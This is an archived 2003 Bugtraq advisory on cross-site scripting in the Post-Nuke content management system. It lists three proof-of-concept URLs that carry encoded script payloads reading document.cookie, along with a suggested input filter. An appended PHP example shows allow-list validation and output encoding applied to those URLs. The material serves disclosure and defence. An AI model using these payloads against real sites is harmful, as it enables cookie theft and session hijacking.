Message-ID: <027101c33196$7de15280$49082150@lonestar0>
Date: Fri, 13 Jun 2003 12:28:09 +0200
From: "David F. Madrid" <idoru@...eosoft.net.uy>
To: <bugtraq@...urityfocus.com>
Subject: Cross site scripting in Post-Nuke


Issue :

Cross site scripting in Post-Nuke

Version affected :

Post Nuke 0.7.2.3-Phoenix

Description :

Post-Nuke is a content management system that allows
you to deploy a website easily. Its developers claim
that their product is more secure than competitors.

I found three places where a script can be injected to
be executed in the context of the webpage, making it possible
to steal user cookies and hijack their sessions.

http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@...ucas.com

http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0

http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index


Solution :

Although I am not a php developer, I think filtering of all
non-alphanumeric characters is needed, not just filtering script
tags passed to vars in the url.

// Replace every run of non-alphanumeric characters with "0" (case-insensitive match)
$good_var = preg_replace('/[^a-z0-9]+/i', '0', $var);


You can find a spanish version of this advisory at

http://nautopia.org/vulnerabilidades/postnuke_xss.htm


Regards ,

David F. Madrid ,
Madrid , Spain
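
Added example (not part of the original message, and not Post-Nuke code): the allow-list idea from the Solution section applied per parameter, next to HTML-encoding at output, run over the query strings of the three URLs above. The function names, the patterns in RULES and the e-mail placeholder are assumptions made for illustration.

```php
<?php
// Added example; not Post-Nuke code. Names and patterns are assumptions.

// Allow-list patterns for parameters that have a known shape.
const RULES = [
    'uname'  => '/\A[A-Za-z0-9_-]{1,25}\z/', // assumed username policy
    'letter' => '/\A[A-Za-z]\z/',            // assumed: one initial letter
    'id_cat' => '/\A[0-9]{1,10}\z/',         // numeric category id
];

// Reject rather than rewrite: returns null when the value is not allowed.
function validated(string $name, string $value): ?string {
    if (!array_key_exists($name, RULES)) {
        return $value; // free text (e.g. categories, email): encode on output
    }
    return preg_match(RULES[$name], $value) === 1 ? $value : null;
}

// Encode at the point of output; covers element text and quoted attributes.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Query strings of the three advisory URLs (the e-mail value is a
// constructed placeholder, since the original is elided in the archive).
$queries = [
    'op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=user%40example.org',
    'op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0',
    'letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index',
];

foreach ($queries as $qs) {
    parse_str($qs, $params); // URL-decodes each value
    foreach ($params as $name => $value) {
        $verdict = validated($name, $value) === null ? 'REJECT' : 'accept';
        // Whatever the verdict, only the encoded form is ever written to HTML.
        printf("%-10s %-7s %s\n", $name, $verdict, h($value));
    }
    echo "\n";
}

// The alphanumeric-only filter from the advisory, applied to a legitimate
// e-mail address: the markup is gone, but so is the address.
echo preg_replace('/[^a-z0-9]+/i', '0', 'user@example.org'), "\n";
```

The uname and letter payloads are rejected by their patterns, while categories has no fixed shape and is made inert only by the encoding step, which is why output encoding is needed in addition to input filtering.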


